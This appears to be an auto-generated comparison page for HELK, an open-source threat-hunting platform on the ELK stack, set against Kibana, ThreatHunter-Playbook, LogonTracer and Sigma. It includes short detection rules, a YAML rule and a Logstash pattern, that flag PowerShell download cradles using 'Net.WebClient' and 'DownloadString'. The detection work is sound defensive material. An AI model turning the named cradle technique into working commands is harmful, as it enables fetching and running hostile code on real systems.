Convert Figma logo to code with AI

Cyb3rWard0g logoHELK

The Hunting ELK

3,741
679
3,741
59
View on GitHub

Top Related Projects

elastic's avatar

kibana

19,705

Your window into the Elastic Stack

OTRF's avatar

ThreatHunter-Playbook

3,968

A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

JPCERTCC's avatar

LogonTracer

2,693

Investigate malicious Windows logon by visualizing and analyzing Windows event log

SigmaHQ's avatar

sigma

8,068

Main Sigma Rule Repository

Quick Overview

The HELK (Hunting ELK) is an advanced threat hunting platform that leverages the ELK (Elasticsearch, Logstash, Kibana) stack along with other open-source tools. It's designed to provide security analysts and threat hunters with a powerful, all-in-one solution for log analysis, alerting, and visualization in cybersecurity contexts.

Pros

  • Comprehensive solution integrating multiple open-source tools for threat hunting
  • Pre-configured dashboards and visualizations for quick insights
  • Supports various data sources and log types
  • Active community and regular updates

Cons

  • Resource-intensive, requiring significant hardware resources
  • Complex setup process, especially for users new to ELK stack
  • Steep learning curve for full utilization of all features
  • May require additional tuning for specific environments

Getting Started

To set up HELK, follow these steps:

  1. Ensure your system meets the minimum requirements (at least 12GB RAM, 50GB disk space).
  2. Clone the HELK repository: 
    git clone https://github.com/Cyb3rWard0g/HELK.git
  3. Navigate to the HELK directory: 
    cd HELK
  4. Run the installation script: 
    sudo ./helk_install.sh
  5. Follow the prompts to select your preferred installation option (Basic, Trial, or Subscription).
  6. Wait for the installation to complete and access the HELK interface via the provided URL.

Note: The installation process may take some time depending on your system and internet connection. Refer to the official documentation for more detailed instructions and troubleshooting.

Competitor Comparisons

elastic logo

kibana

19,705

Your window into the Elastic Stack

Pros of Kibana

  • More mature and widely adopted project with extensive documentation
  • Offers a broader range of visualization and data exploration tools
  • Supports multiple data sources beyond just security logs

Cons of Kibana

  • Requires more setup and configuration for security-specific use cases
  • Less focused on threat hunting and security analytics out-of-the-box
  • Steeper learning curve for security professionals without ELK stack experience

Code Comparison

HELK (Python):

def get_jupyter_credentials():
    jupyter_token = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
    jupyter_password = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
    return jupyter_token, jupyter_password

Kibana (JavaScript):

export function createKibanaReporter({ getService }) {
  const log = getService('log');
  const config = getService('config');
  return {
    reportFailure: (message) => log.error(message)
  };
}

The HELK code snippet focuses on generating credentials for Jupyter notebooks, which is specific to its security-oriented setup. In contrast, the Kibana code relates to creating a reporter service, reflecting its more general-purpose nature for logging and configuration management.

OTRF logo

ThreatHunter-Playbook

3,968

A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.

Pros of ThreatHunter-Playbook

  • Provides a comprehensive collection of threat hunting techniques and procedures
  • Offers a structured approach to threat hunting with detailed playbooks
  • Includes a wide range of data sources and detection opportunities

Cons of ThreatHunter-Playbook

  • Lacks an integrated platform for data ingestion and analysis
  • Requires more manual effort to implement and execute threat hunting procedures
  • May have a steeper learning curve for beginners compared to HELK's all-in-one solution

Code Comparison

ThreatHunter-Playbook (YAML playbook example):

name: Suspicious PowerShell Download Cradle
description: Detects suspicious PowerShell download cradles
data_needed:
  - WinEvent
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains:
      - 'Net.WebClient'
      - 'DownloadString'

HELK (Logstash configuration example):

filter {
  if [event_id] == 4104 {
    grok {
      match => { "ScriptBlockText" => "(?i)Net\.WebClient.*DownloadString" }
      add_tag => [ "suspicious_powershell_download" ]
    }
  }
}

Both repositories offer valuable resources for threat hunting, with ThreatHunter-Playbook focusing on comprehensive playbooks and HELK providing an integrated hunting platform. The choice between them depends on specific organizational needs and existing infrastructure.

JPCERTCC logo

LogonTracer

2,693

Investigate malicious Windows logon by visualizing and analyzing Windows event log

Pros of LogonTracer

  • Focused specifically on visualizing and analyzing Windows logon events
  • Lightweight and easy to deploy with minimal dependencies
  • Provides a user-friendly web interface for interactive analysis

Cons of LogonTracer

  • Limited scope compared to HELK's comprehensive threat hunting capabilities
  • Lacks advanced analytics and machine learning features
  • Does not support as wide a range of data sources as HELK

Code Comparison

LogonTracer (Python):

@app.route('/get_logon_data')
def get_logon_data():
    logon_data = neo4j_exec("MATCH (n:Logon) RETURN n")
    return jsonify(logon_data)

HELK (Elasticsearch query):

{
  "query": {
    "bool": {
      "must": [
        { "match": { "event_id": 4624 } },
        { "match": { "logon_type": 3 } }
      ]
    }
  }
}

LogonTracer focuses on querying a Neo4j database for logon events, while HELK uses Elasticsearch for more complex queries across various data types. HELK's approach allows for more flexible and comprehensive threat hunting capabilities, but LogonTracer's simplicity can be advantageous for quick logon analysis tasks.

SigmaHQ logo

sigma

8,068

Main Sigma Rule Repository

Pros of sigma

  • Flexible and generic approach to log analysis, applicable across various platforms
  • Large community-contributed rule set for detecting diverse threats
  • Easy integration with existing SIEM and log management tools

Cons of sigma

  • Requires additional tools or converters to implement rules in specific environments
  • May need more manual tuning and customization for optimal performance
  • Less out-of-the-box functionality compared to comprehensive platforms like HELK

Code Comparison

sigma rule example:

title: Suspicious Process Creation
detection:
    selection:
        EventID: 1
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection

HELK Jupyter Notebook example:

from elasticsearch import Elasticsearch
es = Elasticsearch([{'host': 'helk-elasticsearch', 'port': 9200}])
query = {"query": {"match": {"event_id": 1}}}
res = es.search(index="winlogbeat-*", body=query)
for hit in res['hits']['hits']:
    print(hit["_source"])

While sigma focuses on defining detection rules, HELK provides a complete platform for ingesting, processing, and analyzing data. sigma offers more flexibility in rule creation, while HELK provides an integrated environment for threat hunting and analysis.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

HELK

License: GPL v3 GitHub issues-closed Twitter Open Source Love stability-alpha

The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack. This project was developed primarily for research, but due to its flexible design and core components, it can be deployed in larger environments with the right configurations and scalable infrastructure.

Goals

  • Provide an open source hunting platform to the community and share the basics of Threat Hunting.
  • Expedite the time it takes to deploy a hunt platform.
  • Improve the testing and development of hunting use cases in an easier and more affordable way.
  • Enable Data Science capabilities while analyzing data via Apache Spark, GraphFrames & Jupyter Notebooks.

Current Status: Alpha

The project is currently in an alpha stage, which means that the code and the functionality are still changing. We haven't yet tested the system with large data sources and in many scenarios. We invite you to try it and welcome any feedback.

Docs:

Resources

Author

Current Committers

License: GPL-3.0

HELK's GNU General Public License